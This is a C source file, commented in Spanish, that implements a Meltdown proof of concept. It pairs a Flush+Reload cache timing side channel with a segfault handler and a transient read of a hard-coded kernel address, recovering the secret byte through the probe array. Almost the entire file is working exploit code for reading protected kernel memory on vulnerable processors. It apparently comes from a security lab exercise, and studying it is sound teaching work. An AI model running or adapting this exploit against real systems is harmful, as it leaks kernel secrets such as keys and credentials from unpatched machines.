#include <stdio.h>
#include <stdint.h>
#include <unistd.h>
#include <string.h>
#include <signal.h>
#include <setjmp.h>
#include <fcntl.h>
#include <emmintrin.h>
#include <x86intrin.h>

uint8_t array[256*4096];
/* cache hit threshold */
#define CACHE_HIT_THRESHOLD (100)
#define DELTA 1024

void flushSideChannel()
{
  int i;

  // Escribir el array en la RAM para prevenir COW
  for (i = 0; i < 256; i++) array[i*4096 + DELTA] = 1;

  // FLUSH en la caché
  for (i = 0; i < 256; i++) _mm_clflush(&array[i*4096 + DELTA]);
}

void reloadSideChannel() 
{
  int junk=0;
  register uint64_t time1, time2;
  volatile uint8_t *addr;
  int i;
  for(i = 0; i < 256; i++){
     addr = &array[i*4096 + DELTA];
     time1 = __rdtscp(&junk);
     junk = *addr;
     time2 = __rdtscp(&junk) - time1;
     if (time2 <= CACHE_HIT_THRESHOLD){
         printf("array[%d*4096 + %d] se encuentra en la caché\n",i,DELTA);
         printf("Secreto = %d\n",i);
     }
  }	
}

void meltdown(unsigned long kernel_data_addr)
{
  char kernel_data = 0;
   
  // Lo siguiente causará una excepción
  kernel_data = *(char*)kernel_data_addr;     
  array[7 * 4096 + DELTA] += 1;          
}

void meltdown_asm(unsigned long kernel_data_addr)
{
   char kernel_data = 0;
   
   // Meter algo que hacer en EAX
   asm volatile(
       ".rept 400;"                
       "add $0x141, %%eax;"
       ".endr;"                    
    
       :
       :
       : "eax"
   ); 
    
   // Lo siguiente causará una excepción
   kernel_data = *(char*)kernel_data_addr;  
   array[kernel_data * 4096 + DELTA] += 1;           
}

// Manejador de señales
static sigjmp_buf jbuf;
static void catch_segv()
{
  siglongjmp(jbuf, 1);
}

int main()
{
  // Registrar el controlador
  signal(SIGSEGV, catch_segv);

  // FLUSH del array de prueba
  flushSideChannel();
    
  if (sigsetjmp(jbuf, 1) == 0) {
      meltdown(0xf8536000);                
  }
  else {
      printf("Memoria protegida!\n");
  }

  // RELOAD el array de prueba
  reloadSideChannel();                     
  return 0;
}


